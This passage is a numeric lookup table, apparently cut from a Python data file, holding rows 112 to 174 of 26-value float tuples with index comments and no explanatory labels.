(13.14535615196517, 10.133888260542502, 10.803801340306359, 11.434737313808373, 9.925829231555449, 4.700913196667176, 4.297693805642971, 3.5783597774729468, 5.079852762536198, 2.1041154404368063, 1.6364205101699256, 0.9640011992716131, 0.0, 13.313394311556928, 10.604013191987741, 8.182102550849628, 6.312346321310418, 10.159705525072397, 5.0097036884621255, 4.297693805642971, 3.357795140476554, 4.962914615777724, 3.8115791046027923, 2.160760268061272, 0.9212625691402275, 0.0), # 112
(13.104705913184263, 10.078784894108638, 10.779554132960747, 11.402825576616644, 9.907497301495457, 4.690826978191853, 4.277368174559739, 3.5675806651220205, 5.07019931192069, 2.095906657814456, 1.6302822447690024, 0.9610058425921835, 0.0, 13.286621461180511, 10.571064268514016, 8.151411223845011, 6.287719973443367, 10.14039862384138, 4.9946129311708285, 4.277368174559739, 3.3505906987084666, 4.953748650747729, 3.8009418588722155, 2.15591082659215, 0.9162531721916946, 0.0), # 113
(13.064073257060091, 10.024626385524439, 10.755553287525224, 11.371278892341204, 9.88903379759524, 4.681014596966087, 4.257412745887406, 3.557289901377987, 5.060822216666095, 2.0878603087694745, 1.6242903453264128, 0.9580564200798471, 0.0, 13.25978557982405, 10.538620620878318, 8.121451726632063, 6.263580926308422, 10.12164443333219, 4.980205861929182, 4.257412745887406, 3.3435818549757763, 4.94451689879762, 3.790426297447069, 2.1511106575050447, 0.9113296714113127, 0.0), # 114
(13.023338864205595, 9.97143223830991, 10.731813088158539, 11.340088730440868, 9.870380499362694, 4.671450535207326, 4.2378417551340934, 3.547484881662581, 5.051724990045435, 2.0799888647958276, 1.6184360526663222, 0.9551543846318662, 0.0, 13.232809284324528, 10.506698230950526, 8.09218026333161, 6.239966594387481, 10.10344998009087, 4.966478834327614, 4.2378417551340934, 3.336750382290947, 4.935190249681347, 3.780029576813624, 2.146362617631708, 0.9064938398463556, 0.0), # 115
(12.982451822532688, 9.919124960991017, 10.708287554981187, 11.309199457779725, 9.851509291291528, 4.662112249784464, 4.218623372269525, 3.5381385158577467, 5.042884624972988, 2.072277675457342, 1.6127080506300124, 0.9522943730401906, 0.0, 13.205650163658248, 10.475238103442095, 8.063540253150062, 6.216833026372026, 10.085769249945976, 4.953393922200846, 4.218623372269525, 3.330080178417474, 4.925754645645764, 3.7697331525932425, 2.1416575109962372, 0.9017386328173653, 0.0), # 116
(12.941361219953283, 9.867627062093726, 10.68493070811365, 11.278555441221856, 9.832392057875436, 4.652977197566394, 4.199725767263427, 3.529223713845425, 5.034278114363028, 2.0647120903178457, 1.6070950230587664, 0.949471022096771, 0.0, 13.178265806801516, 10.44418124306448, 8.035475115293831, 6.1941362709535355, 10.068556228726056, 4.940913199383595, 4.199725767263427, 3.3235551411188533, 4.916196028937718, 3.7595184804072863, 2.1369861416227303, 0.8970570056448843, 0.0), # 117
(12.900016144379297, 9.816861050144, 10.66169656767643, 11.248101047631351, 9.81300068360812, 4.644022835422014, 4.181117110085521, 3.5207133855075567, 5.025882451129837, 2.0572774589411664, 1.6015856537938657, 0.9466789685935577, 0.0, 13.150613802730636, 10.413468654529133, 8.007928268969328, 6.171832376823498, 10.051764902259674, 4.92899873971058, 4.181117110085521, 3.317159168158581, 4.90650034180406, 3.7493670158771177, 2.132339313535286, 0.8924419136494547, 0.0), # 118
(12.858365683722639, 9.766749433667803, 10.638539153790012, 11.217780643872292, 9.793307052983273, 4.635226620220214, 4.162765570705529, 3.512580440726085, 5.017674628187687, 2.0499591308911307, 1.5961686266765933, 0.9439128493225009, 0.0, 13.122651740421906, 10.383041342547507, 7.980843133382966, 6.149877392673391, 10.035349256375374, 4.91761261701652, 4.162765570705529, 3.310876157300153, 4.896653526491637, 3.7392602146240983, 2.1277078307580024, 0.8878863121516185, 0.0), # 119
(12.816358925895228, 9.717214721191104, 10.61541248657489, 11.187538596808764, 9.773283050494598, 4.626566008829889, 4.144639319093177, 3.5047977893829505, 5.009631638450861, 2.0427424557315677, 1.5908326255482306, 0.9411673010755515, 0.0, 13.094337208851638, 10.352840311831065, 7.954163127741153, 6.128227367194702, 10.019263276901722, 4.906716905136131, 4.144639319093177, 3.3046900063070637, 4.886641525247299, 3.729179532269589, 2.1230824973149782, 0.8833831564719186, 0.0), # 120
(12.773944958808976, 9.668179421239865, 10.592270586151553, 11.157319273304857, 9.75290056063579, 4.618018458119934, 4.126706525218187, 3.4973383413600962, 5.001730474833633, 2.035612783026304, 1.5855663342500608, 0.9384369606446594, 0.0, 13.065627796996127, 10.322806567091252, 7.927831671250303, 6.106838349078911, 10.003460949667266, 4.8962736779041345, 4.126706525218187, 3.29858461294281, 4.876450280317895, 3.719106424434953, 2.118454117230311, 0.878925401930897, 0.0), # 121
(12.731072870375797, 9.61956604234005, 10.569067472640498, 11.127067040224649, 9.732131467900551, 4.609561424959241, 4.108935359050283, 3.490175006539462, 4.993948130250281, 2.0285554623391677, 1.5803584366233656, 0.9357164648217753, 0.0, 13.036481093831679, 10.292881113039527, 7.901792183116827, 6.085666387017502, 9.987896260500563, 4.886245009155247, 4.108935359050283, 3.2925438749708866, 4.8660657339502755, 3.7090223467415506, 2.1138134945280997, 0.8745060038490956, 0.0), # 122
(12.687691748507607, 9.571297093017627, 10.54575716616221, 11.09672626443223, 9.71094765678258, 4.601172366216706, 4.091293990559188, 3.4832806948029904, 4.986261597615085, 2.021555843233986, 1.5751976165094272, 0.9330004503988493, 0.0, 13.0068546883346, 10.263004954387341, 7.875988082547136, 6.064667529701957, 9.97252319523017, 4.876592972724187, 4.091293990559188, 3.28655169015479, 4.85547382839129, 3.698908754810744, 2.109151433232442, 0.8701179175470571, 0.0), # 123
(12.643750681116316, 9.523295081798558, 10.522293686837184, 11.066241312791686, 9.689321011775569, 4.592828738761221, 4.073750589714624, 3.476628316032624, 4.97864786984232, 2.014599275274587, 1.5700725577495283, 0.9302835541678323, 0.0, 12.976706169481197, 10.233119095846153, 7.85036278874764, 6.04379782582376, 9.95729573968464, 4.8672796424456735, 4.073750589714624, 3.280591956258015, 4.844660505887784, 3.6887471042638964, 2.104458737367437, 0.8657540983453236, 0.0), # 124
(12.599198756113843, 9.475482517208812, 10.498631054785912, 11.0355565521671, 9.667223417373222, 4.584507999461682, 4.056273326486318, 3.4701907801103036, 4.971083939846263, 2.0076711080247973, 1.5649719441849508, 0.927560412920674, 0.0, 12.94599312624776, 10.203164542127412, 7.824859720924753, 6.023013324074391, 9.942167879692526, 4.858267092154425, 4.056273326486318, 3.2746485710440583, 4.833611708686611, 3.678518850722367, 2.0997262109571824, 0.8614075015644376, 0.0), # 125
(12.553985061412101, 9.427781907774351, 10.474723290128884, 11.004616349422557, 9.644626758069233, 4.5761876051869805, 4.038830370843989, 3.463940996917971, 4.963546800541195, 2.0007566910484456, 1.5598844596569765, 0.9248256634493257, 0.0, 12.91467314761061, 10.173082297942582, 7.799422298284883, 6.002270073145335, 9.92709360108239, 4.849517395685159, 4.038830370843989, 3.268705432276415, 4.822313379034616, 3.66820544980752, 2.094944658025777, 0.8570710825249411, 0.0), # 126
(12.508058684923006, 9.380115762021138, 10.450524412986589, 10.973365071422144, 9.621502918357304, 4.567845012806012, 4.021389892757366, 3.4578518763375685, 4.95601344484139, 1.993841373909359, 1.5547987880068885, 0.9220739425457369, 0.0, 12.88270382254604, 10.142813368003106, 7.773993940034442, 5.981524121728076, 9.91202688968278, 4.8409926268725965, 4.021389892757366, 3.26274643771858, 4.810751459178652, 3.6577883571407157, 2.090104882597318, 0.8527377965473764, 0.0), # 127
(12.461368714558466, 9.332406588475143, 10.425988443479525, 10.941747085029949, 9.597823782731137, 4.5594576791876715, 4.003920062196168, 3.451896328251037, 4.948460865661126, 1.986910506171365, 1.5497036130759692, 0.9192998870018588, 0.0, 12.850042740030352, 10.112298757020445, 7.748518065379845, 5.960731518514094, 9.896921731322252, 4.832654859551452, 4.003920062196168, 3.2567554851340508, 4.798911891365568, 3.6472490283433174, 2.085197688695905, 0.8484005989522859, 0.0), # 128
(12.413864238230394, 9.284576895662326, 10.401069401728181, 10.909706757110053, 9.573561235684425, 4.551003061200851, 3.9863890491301195, 3.446047262540319, 4.9408660559146815, 1.9799494373982915, 1.5445876187055003, 0.916498133609641, 0.0, 12.816647489039854, 10.08147946970605, 7.7229380935275005, 5.939848312194873, 9.881732111829363, 4.824466167556446, 3.9863890491301195, 3.250716472286322, 4.786780617842212, 3.636568919036685, 2.0802138803456365, 0.8440524450602116, 0.0), # 129
(12.365494343850713, 9.236549192108656, 10.375721307853043, 10.877188454526541, 9.548687161710866, 4.542458615714445, 3.968765023528944, 3.440277589087355, 4.933206008516334, 1.9729435171539655, 1.539439488736764, 0.9136633191610346, 0.0, 12.78247565855085, 10.050296510771378, 7.697197443683819, 5.9188305514618955, 9.866412017032667, 4.816388624722297, 3.968765023528944, 3.244613296938889, 4.774343580855433, 3.6257294848421813, 2.075144261570609, 0.8396862901916962, 0.0), # 130
(12.316208119331334, 9.188245986340096, 10.349898181974611, 10.8441365441435, 9.523173445304161, 4.533801799597346, 3.9510161553623666, 3.4345602177740875, 4.92545771638036, 1.9658780950022154, 1.5342479070110426, 0.9107900804479897, 0.0, 12.747484837539638, 10.018690884927885, 7.671239535055213, 5.897634285006645, 9.85091543276072, 4.808384304883723, 3.9510161553623666, 3.238429856855247, 4.761586722652081, 3.614712181381168, 2.0699796363949226, 0.8352950896672816, 0.0), # 131
(12.265954652584163, 9.139589786882611, 10.32355404421337, 10.810495392825016, 9.49699197095801, 4.525010069718451, 3.9331106146001082, 3.4288680584824593, 4.917598172421039, 1.9587385205068681, 1.5290015573696185, 0.9078730542624567, 0.0, 12.711632614982527, 9.986603596887022, 7.645007786848092, 5.876215561520603, 9.835196344842078, 4.800415281875443, 3.9331106146001082, 3.2321500497988938, 4.748495985479005, 3.6034984642750065, 2.0647108088426744, 0.8308717988075103, 0.0), # 132
(12.21468303152113, 9.090503102262165, 10.296642914689816, 10.776209367435175, 9.470114623166108, 4.516060882946651, 3.915016571211893, 3.4231740210944106, 4.909604369552646, 1.9515101432317519, 1.5236891236537742, 0.904906877396386, 0.0, 12.674876579855821, 9.953975651360244, 7.618445618268871, 5.854530429695254, 9.819208739105292, 4.792443629532175, 3.915016571211893, 3.2257577735333225, 4.735057311583054, 3.5920697891450595, 2.059328582937963, 0.8264093729329243, 0.0), # 133
(12.162342344054133, 9.040908441004726, 10.26911881352444, 10.741222834838059, 9.442513286422153, 4.5069316961508425, 3.896702195167445, 3.4174510154918845, 4.90145330068946, 1.9441783127406937, 1.518299289704792, 0.9018861866417278, 0.0, 12.637174321135817, 9.920748053059004, 7.5914964485239596, 5.83253493822208, 9.80290660137892, 4.784431421688638, 3.896702195167445, 3.21923692582203, 4.721256643211077, 3.5804076116126873, 2.053823762704888, 0.8219007673640661, 0.0), # 134
(12.108881678095097, 8.990728311636257, 10.24093576083773, 10.705480161897759, 9.414159845219846, 4.4975999661999175, 3.8781356564364877, 3.4116719515568206, 4.893121958745757, 1.9367283785975222, 1.5128207393639534, 0.898805618790433, 0.0, 12.59848342779883, 9.88686180669476, 7.5641036968197675, 5.810185135792565, 9.786243917491515, 4.776340732179549, 3.8781356564364877, 3.212571404428512, 4.707079922609923, 3.5684933872992537, 2.048187152167546, 0.817338937421478, 0.0), # 135
(12.05425012155593, 8.93988522268272, 10.212047776750177, 10.668925715478352, 9.385026184052883, 4.488043149962771, 3.8592851249887445, 3.4058097391711617, 4.884587336635816, 1.9291456903660635, 1.5072421564725416, 0.8956598106344515, 0.0, 12.558761488821151, 9.852257916978965, 7.536210782362707, 5.787437071098189, 9.769174673271632, 4.768133634839627, 3.8592851249887445, 3.205745107116265, 4.6925130920264415, 3.556308571826118, 2.042409555350036, 0.812716838425702, 0.0), # 136
(11.998396762348548, 8.888301682670086, 10.18240888138228, 10.631503862443932, 9.355084187414965, 4.478238704308296, 3.8401187707939393, 3.399837288216851, 4.875826427273916, 1.9214155976101461, 1.5015522248718383, 0.8924433989657341, 0.0, 12.517966093179089, 9.816877388623073, 7.507761124359191, 5.764246792830437, 9.751652854547832, 4.759772203503592, 3.8401187707939393, 3.1987419316487826, 4.6775420937074825, 3.543834620814645, 2.036481776276456, 0.8080274256972807, 0.0), # 137
(11.941270688384867, 8.835900200124316, 10.15197309485452, 10.593158969658578, 9.32430573979979, 4.4681640861053875, 3.8206047638217933, 3.393727508575828, 4.8668162235743315, 1.913523449893597, 1.4957396284031257, 0.889151020576231, 0.0, 12.476054829848946, 9.78066122633854, 7.478698142015627, 5.740570349680789, 9.733632447148663, 4.751218512006159, 3.8206047638217933, 3.1915457757895624, 4.662152869899895, 3.5310529898861933, 2.0303946189709046, 0.8032636545567561, 0.0), # 138
(11.882820987576796, 8.782603283571376, 10.120694437287398, 10.553835403986378, 9.292662725701055, 4.457796752222938, 3.800711274042032, 3.3874533101300353, 4.85753371845134, 1.9054545967802445, 1.4897930509076862, 0.8857773122578926, 0.0, 12.432985287807028, 9.743550434836816, 7.448965254538431, 5.716363790340733, 9.71506743690268, 4.742434634182049, 3.800711274042032, 3.184140537302099, 4.646331362850527, 3.517945134662127, 2.0241388874574797, 0.7984184803246707, 0.0), # 139
(11.822996747836257, 8.72833344153723, 10.088526928801404, 10.513477532291418, 9.26012702961246, 4.447114159529844, 3.780406471424378, 3.3809876027614147, 4.847955904819222, 1.8971943878339157, 1.4837011762268022, 0.8823169108026693, 0.0, 12.38871505602964, 9.70548601882936, 7.41850588113401, 5.691583163501746, 9.695911809638444, 4.733382643865981, 3.780406471424378, 3.176510113949888, 4.63006351480623, 3.5044925107638067, 2.017705385760281, 0.7934848583215663, 0.0), # 140
(11.761747057075162, 8.673013182547843, 10.055424589517022, 10.472029721437782, 9.226670536027703, 4.436093764894997, 3.7596585259385567, 3.374303296351908, 4.838059775592251, 1.8887281726184386, 1.477452688201756, 0.8787644530025115, 0.0, 12.34320172349308, 9.666408983027624, 7.38726344100878, 5.6661845178553145, 9.676119551184502, 4.724024614892672, 3.7596585259385567, 3.168638403496426, 4.613335268013851, 3.490676573812595, 2.0110849179034047, 0.7884557438679859, 0.0), # 141
(11.69902100320542, 8.616565015129181, 10.02134143955475, 10.429436338289557, 9.192265129440482, 4.424713025187291, 3.7384356075542886, 3.367373300783457, 4.827822323684707, 1.8800413006976404, 1.4710362706738296, 0.8751145756493696, 0.0, 12.296402879173653, 9.626260332143064, 7.355181353369148, 5.64012390209292, 9.655644647369414, 4.71432262109684, 3.7384356075542886, 3.160509303705208, 4.596132564720241, 3.4764787794298533, 2.0042682879109504, 0.7833240922844712, 0.0), # 142
(11.634767674138946, 8.558911447807208, 9.986231499035082, 10.385641749710825, 9.156882694344494, 4.412949397275621, 3.7167058862412983, 3.360170525938002, 4.817220542010869, 1.871119121635349, 1.4644406074843055, 0.8713619155351939, 0.0, 12.248276112047666, 9.584981070887132, 7.322203037421526, 5.6133573649060455, 9.634441084021738, 4.704238736313203, 3.7167058862412983, 3.1521067123397293, 4.578441347172247, 3.4618805832369426, 1.9972462998070164, 0.7780828588915646, 0.0), # 143
(11.56893615778766, 8.499974989107892, 9.950048788078501, 10.340590322565676, 9.12049511523344, 4.400780338028881, 3.6944375319693092, 3.3526678816974873, 4.806231423485011, 1.8619469849953916, 1.4576543824744654, 0.867501109451935, 0.0, 12.198779011091421, 9.542512203971285, 7.288271912372326, 5.585840954986173, 9.612462846970022, 4.693735034376482, 3.6944375319693092, 3.1434145271634857, 4.56024755761672, 3.446863440855226, 1.9900097576157, 0.7727249990098085, 0.0), # 144
(11.501475542063469, 8.439678147557194, 9.912747326805505, 10.294226423718191, 9.083074276601018, 4.388183304315964, 3.6715987147080456, 3.344838277943853, 4.794831961021412, 1.8525102403415963, 1.4506662794855925, 0.8635267941915434, 0.0, 12.14786916528122, 9.498794736106976, 7.253331397427962, 5.557530721024787, 9.589663922042824, 4.682773589121394, 3.6715987147080456, 3.1344166459399743, 4.541537138300509, 3.4314088079060645, 1.9825494653611013, 0.7672434679597451, 0.0), # 145
(11.432334914878291, 8.377943431681082, 9.874281135336586, 10.246494420032459, 9.044592062940927, 4.375135753005765, 3.6481576044272312, 3.336654624559041, 4.782999147534349, 1.8427942372377903, 1.4434649823589683, 0.8594336065459691, 0.0, 12.095504163593366, 9.453769672005658, 7.21732491179484, 5.52838271171337, 9.565998295068699, 4.671316474382658, 3.6481576044272312, 3.125096966432689, 4.522296031470463, 3.41549814001082, 1.9748562270673173, 0.7616312210619166, 0.0), # 146
(11.361463364144042, 8.314693350005518, 9.83460423379223, 10.19733867837256, 9.005020358746862, 4.361615140967176, 3.6240823710965873, 3.3280898314249927, 4.770709975938102, 1.8327843252478015, 1.4360391749358754, 0.855216183307163, 0.0, 12.041641595004167, 9.407378016378791, 7.180195874679377, 5.498352975743403, 9.541419951876204, 4.65932576399499, 3.6240823710965873, 3.1154393864051255, 4.502510179373431, 3.3991128927908543, 1.966920846758446, 0.7558812136368653, 0.0), # 147
(11.288809977772631, 8.24985041105647, 9.793670642292932, 10.146703565602587, 8.964331048512523, 4.347598925069094, 3.599341184685839, 3.3191168084236504, 4.757941439146947, 1.822465853935457, 1.428377541057596, 0.8508691612670749, 0.0, 11.986239048489919, 9.359560773937822, 7.141887705287981, 5.4673975618063695, 9.515882878293894, 4.646763531793111, 3.599341184685839, 3.105427803620781, 4.482165524256262, 3.38223452186753, 1.9587341284585866, 0.7499864010051337, 0.0), # 148
(11.214323843675977, 8.1833371233599, 9.751434380959186, 10.094533448586619, 8.922496016731612, 4.33306456218041, 3.573902215164709, 3.3097084654369557, 4.744670530075158, 1.8118241728645852, 1.4204687645654126, 0.8463871772176558, 0.0, 11.929254113026934, 9.310258949394212, 7.102343822827062, 5.4354725185937545, 9.489341060150316, 4.6335918516117385, 3.573902215164709, 3.09504611584315, 4.461248008365806, 3.3648444828622073, 1.950286876191837, 0.7439397384872637, 0.0), # 149
(11.137954049765991, 8.115075995441773, 9.707849469911476, 10.040772694188746, 8.879487147897825, 4.317989509170021, 3.5477336325029207, 3.29983771234685, 4.730874241637018, 1.8008446315990123, 1.412301529300607, 0.8417648679508558, 0.0, 11.870644377591507, 9.259413547459413, 7.061507646503035, 5.402533894797036, 9.461748483274036, 4.61977279728559, 3.5477336325029207, 3.084278220835729, 4.439743573948912, 3.3469242313962493, 1.9415698939822956, 0.7377341814037977, 0.0), # 150
(11.059649683954586, 8.044989535828057, 9.6628699292703, 9.985365669273047, 8.835276326504857, 4.302351222906816, 3.5208036066701984, 3.2894774590352758, 4.716529566746802, 1.789512579702568, 1.4038645191044614, 0.8369968702586252, 0.0, 11.810367431159946, 9.206965572844876, 7.019322595522306, 5.368537739107703, 9.433059133493604, 4.605268442649386, 3.5208036066701984, 3.0731080163620117, 4.417638163252429, 3.3284552230910167, 1.9325739858540603, 0.731362685075278, 0.0), # 151
(10.979359834153682, 7.973000253044715, 9.616449779156152, 9.928256740703617, 8.789835437046412, 4.286127160259694, 3.4930803076362653, 3.2786006153841747, 4.701613498318786, 1.7778133667390779, 1.3951464178182584, 0.8320778209329146, 0.0, 11.748380862708558, 9.15285603026206, 6.975732089091292, 5.333440100217232, 9.403226996637573, 4.590040861537845, 3.4930803076362653, 3.061519400185496, 4.394917718523206, 3.309418913567873, 1.9232899558312306, 0.7248182048222469, 0.0), # 152
(10.897033588275185, 7.899030655617714, 9.568543039689514, 9.86939027534453, 8.743136364016186, 4.269294778097547, 3.4645319053708437, 3.2671800912754865, 4.686103029267251, 1.7657323422723707, 1.3861359092832806, 0.8270023567656742, 0.0, 11.68464226121364, 9.097025924422415, 6.930679546416402, 5.297197026817111, 9.372206058534502, 4.574052127785681, 3.4645319053708437, 3.049496270069676, 4.371568182008093, 3.2897967584481775, 1.9137086079379029, 0.7180936959652467, 0.0), # 153
(10.81262003423102, 7.823003252073014, 9.519103730990887, 9.80871064005988, 8.695150991907875, 4.251831533289268, 3.43512656984366, 3.2551887965911552, 4.6699751525064706, 1.7532548558662742, 1.3768216773408095, 0.8217651145488547, 0.0, 11.6191092156515, 9.0394162600374, 6.884108386704048, 5.259764567598821, 9.339950305012941, 4.557264315227617, 3.43512656984366, 3.037022523778049, 4.347575495953937, 3.2695702133532945, 1.9038207461981775, 0.7111821138248196, 0.0), # 154
(10.72606825993309, 7.744840550936584, 9.468085873180756, 9.746162201713748, 8.645851205215184, 4.233714882703753, 3.404832471024433, 3.2425996412131215, 4.653206860950727, 1.7403662570846146, 1.3671924058321279, 0.8163607310744064, 0.0, 11.551739314998438, 8.97996804181847, 6.8359620291606396, 5.221098771253843, 9.306413721901453, 4.53963949769837, 3.404832471024433, 3.0240820590741087, 4.322925602607592, 3.2487207339045834, 1.8936171746361512, 0.7040764137215078, 0.0), # 155
(10.637327353293314, 7.664465060734389, 9.415443486379615, 9.68168932717022, 8.595208888431804, 4.214922283209894, 3.37361777888289, 3.2293855350233276, 4.635775147514292, 1.727051895491221, 1.357236778598518, 0.8107838431342794, 0.0, 11.48249014823076, 8.918622274477073, 6.7861838929925895, 5.181155686473662, 9.271550295028584, 4.521139749032659, 3.37361777888289, 3.0106587737213526, 4.297604444215902, 3.2272297757234076, 1.8830886972759233, 0.6967695509758537, 0.0), # 156
(10.546346402223609, 7.581799289992394, 9.361130590707957, 9.615236383293386, 8.543195926051439, 4.195431191676585, 3.3414506633887537, 3.215519387903715, 4.6176570051114485, 1.7132971206499201, 1.3469434794812618, 0.8050290875204243, 0.0, 11.411319304324769, 8.855319962724668, 6.734717397406309, 5.1398913619497595, 9.235314010222897, 4.501727143065201, 3.3414506633887537, 2.996736565483275, 4.2715979630257195, 3.205078794431129, 1.8722261181415913, 0.6892544809083996, 0.0), # 157
(10.450553324967336, 7.495248171657732, 9.302523946219415, 9.544258060733807, 8.48743569881293, 4.174003322325641, 3.3075747046495003, 3.200048222203801, 4.597442309412912, 1.698678070701901, 1.335972342259087, 0.7988866158226731, 0.0, 11.335080203181485, 8.787752774049402, 6.679861711295434, 5.096034212105701, 9.194884618825824, 4.480067511085322, 3.3075747046495003, 2.9814309445183147, 4.243717849406465, 3.1814193535779363, 1.8605047892438833, 0.6813861974234302, 0.0), # 158
(10.335201473769764, 7.395933826819331, 9.224527454803487, 9.454176016727876, 8.414178555796186, 4.143513212539135, 3.2677489343700015, 3.17754122744589, 4.566999388570334, 1.6807983479345614, 1.3223972849777657, 0.7911589610963629, 0.0, 11.235598705688274, 8.70274857205999, 6.611986424888827, 5.042395043803683, 9.133998777140668, 4.448557718424246, 3.2677489343700015, 2.9596522946708106, 4.207089277898093, 3.1513920055759597, 1.8449054909606977, 0.6723576206199392, 0.0), # 159
(10.198820932866035, 7.28304080162725, 9.125574450948537, 9.343506385929302, 8.321992122590341, 4.103212058438943, 3.221570623868649, 3.147432860557619, 4.525465106040038, 1.6594219781520132, 1.3060272186755595, 0.7817252273702489, 0.0, 11.110988852451014, 8.598977501072737, 6.530136093377798, 4.978265934456038, 9.050930212080075, 4.406406004780667, 3.221570623868649, 2.9308657560278157, 4.160996061295171, 3.114502128643102, 1.8251148901897079, 0.6620946183297501, 0.0), # 160
(10.042510876420344, 7.1573051140366015, 9.006721467228694, 9.213301128944565, 8.211833582663305, 4.053588080615757, 3.1693770122048135, 3.1101003109807053, 4.473387224599541, 1.6347303676098288, 1.2870063860732652, 0.77067287137255, 0.0, 10.962523662746737, 8.477401585098049, 6.435031930366326, 4.904191102829485, 8.946774449199083, 4.354140435372988, 3.1693770122048135, 2.8954200575826836, 4.105916791331652, 3.071100376314856, 1.801344293445739, 0.6506641012760548, 0.0), # 161
(9.8673704785969, 7.01946278200249, 8.86902503621808, 9.064612206380144, 8.08466011948299, 3.9951294996602726, 3.1115053384378664, 3.0659207681568685, 4.411313507026364, 1.6069049225635816, 1.2654790298916783, 0.7580893498314843, 0.0, 10.791476155852466, 8.338982848146326, 6.3273951494583915, 4.820714767690744, 8.822627014052728, 4.292289075419616, 3.1115053384378664, 2.8536639283287664, 4.042330059741495, 3.0215374021267154, 1.773805007243616, 0.6381329801820447, 0.0), # 162
(9.674498913559898, 6.870249823480022, 8.71354169049082, 8.898491578842531, 7.941428916517308, 3.928324536163185, 3.048292841627181, 3.015271421527823, 4.339791716098023, 1.5761270492688444, 1.2415893928515955, 0.7440621194752707, 0.0, 10.599119351045232, 8.184683314227977, 6.207946964257977, 4.728381147806532, 8.679583432196045, 4.221379990138953, 3.048292841627181, 2.8059460972594175, 3.970714458258654, 2.9661638596141775, 1.742708338098164, 0.6245681657709112, 0.0), # 163
(9.464995355473539, 6.710402256424303, 8.54132796262104, 8.71599120693821, 7.783097157234176, 3.853661410715189, 2.9800767608321266, 2.9585294605352903, 4.259369614592037, 1.5425781539811894, 1.2154817176738126, 0.7286786370321272, 0.0, 10.386726267602059, 8.015465007353399, 6.077408588369063, 4.627734461943566, 8.518739229184074, 4.141941244749407, 2.9800767608321266, 2.752615293367992, 3.891548578617088, 2.905330402312737, 1.7082655925242083, 0.6100365687658459, 0.0), # 164
(9.239958978502024, 6.5406560987904445, 8.353440385182864, 8.518163051273666, 7.610622025101502, 3.771628343906979, 2.9071943351120755, 2.8960720746209856, 4.1705949652859235, 1.5064396429561904, 1.1873002470791263, 0.7120263592302724, 0.0, 10.155569924799979, 7.832289951532995, 5.936501235395631, 4.51931892886857, 8.341189930571847, 4.05450090446938, 2.9071943351120755, 2.694020245647842, 3.805311012550751, 2.839387683757889, 1.670688077036573, 0.5946050998900405, 0.0), # 165
(9.000488956809557, 6.361747368533551, 8.150935490750417, 8.306059072455376, 7.4249607035872005, 3.682713556329251, 2.8299828035264003, 2.8282764532266285, 4.074015530957201, 1.4678929224494195, 1.157189223788332, 0.6941927427979253, 0.0, 9.906923341916015, 7.636120170777177, 5.78594611894166, 4.403678767348258, 8.148031061914402, 3.95958703451728, 2.8299828035264003, 2.630509683092322, 3.7124803517936003, 2.768686357485126, 1.6301870981500834, 0.5783406698666865, 0.0), # 166
(8.747684464560333, 6.174412083608727, 7.934869811897824, 8.080731231089835, 7.2270703761591815, 3.5874052685726983, 2.7487794051344725, 2.7555197857939366, 3.9701790743833865, 1.4271193987164503, 1.1252928905222266, 0.6752652444633036, 0.0, 9.642059538227196, 7.427917689096338, 5.626464452611132, 4.28135819614935, 7.940358148766773, 3.8577277001115116, 2.7487794051344725, 2.562432334694784, 3.6135351880795907, 2.693577077029946, 1.5869739623795647, 0.5613101894189753, 0.0), # 167
(8.482644675918554, 5.979386261971081, 7.706299881199207, 7.843231487783524, 7.017908226285359, 3.4861917012280164, 2.663921378995663, 2.6781792617646265, 3.8596333583419993, 1.3843004780128556, 1.0917554900016058, 0.6553313209546264, 0.0, 9.362251533010546, 7.20864453050089, 5.458777450008029, 4.152901434038566, 7.7192667166839986, 3.7494509664704774, 2.663921378995663, 2.490136929448583, 3.5089541131426794, 2.614410495927842, 1.5412599762398416, 0.5435805692700985, 0.0), # 168
(8.206468765048422, 5.777405921575724, 7.466282231228694, 7.594611803142927, 6.798431437433646, 3.3795610748859013, 2.5757459641693443, 2.5966320705804184, 3.7429261456105576, 1.339617566594208, 1.0567212649472661, 0.6344784290001119, 0.0, 9.0687723455431, 6.9792627190012295, 5.28360632473633, 4.018852699782624, 7.485852291221115, 3.635284898812586, 2.5757459641693443, 2.413972196347072, 3.399215718716823, 2.5315372677143095, 1.493256446245739, 0.5252187201432478, 0.0), # 169
(7.9202559061141375, 5.569207080377758, 7.215873394560408, 7.335924137774526, 6.569597193071951, 3.268001610137046, 2.4845903997148873, 2.5112554016830275, 3.620605198966578, 1.2932520707160806, 1.020334458080004, 0.6127940253279787, 0.0, 8.762894995101878, 6.740734278607764, 5.101672290400019, 3.879756212148241, 7.241210397933156, 3.5157575623562387, 2.4845903997148873, 2.3342868643836043, 3.2847985965359756, 2.4453080459248424, 1.4431746789120816, 0.5062915527616144, 0.0), # 170
(7.6251052732799005, 5.355525756332291, 6.956129903768475, 7.068220452284813, 6.3323626766681915, 3.152001527572146, 2.390791924691664, 2.4224264445141737, 3.4932182811875796, 1.2453853966340462, 0.9827393121206148, 0.5903655666664452, 0.0, 8.445892500963913, 6.494021233330896, 4.913696560603074, 3.736156189902138, 6.986436562375159, 3.3913970223198433, 2.390791924691664, 2.2514296625515327, 3.1661813383340958, 2.356073484094938, 1.391225980753695, 0.4868659778483902, 0.0), # 171
(7.322116040709912, 5.137097967394431, 6.688108291427019, 6.792552707280267, 6.087685071690277, 3.0320490477818964, 2.2946877781590462, 2.3305223885155746, 3.3613131550510804, 1.1961989506036783, 0.9440800697898953, 0.56728050974373, 0.0, 8.119037882406225, 6.24008560718103, 4.720400348949476, 3.588596851811034, 6.722626310102161, 3.2627313439218044, 2.2946877781590462, 2.165749319844212, 3.0438425358451386, 2.2641842357600894, 1.337621658285404, 0.4670089061267665, 0.0), # 172
(7.012387382568372, 4.914659731519285, 6.412865090110164, 6.509972863367375, 5.836521561606121, 2.9086323913569916, 2.196615199176405, 2.235920423128947, 3.225437583334597, 1.145874138880549, 0.9045009738086416, 0.5436263112880514, 0.0, 7.783604158705848, 5.979889424168563, 4.522504869043208, 3.437622416641646, 6.450875166669194, 3.130288592380526, 2.196615199176405, 2.077594565254994, 2.9182607808030605, 2.169990954455792, 1.282573018022033, 0.446787248319935, 0.0), # 173
(6.697018473019482, 4.6889470666619575, 6.131456832392036, 6.221532881152618, 5.579829329883635, 2.7822397788881266, 2.096911426803113, 2.1389977377960108, 3.08613932881565, 1.0945923677202316, 0.8641462668976501, 0.519490428027628, 0.0, 7.440864349139807, 5.7143947083039075, 4.32073133448825, 3.283777103160694, 6.1722786576313, 2.994596832914415, 2.096911426803113, 1.9873141277772333, 2.7899146649418176, 2.07384429371754, 1.2262913664784072, 0.42626791515108714, 0.0), # 174
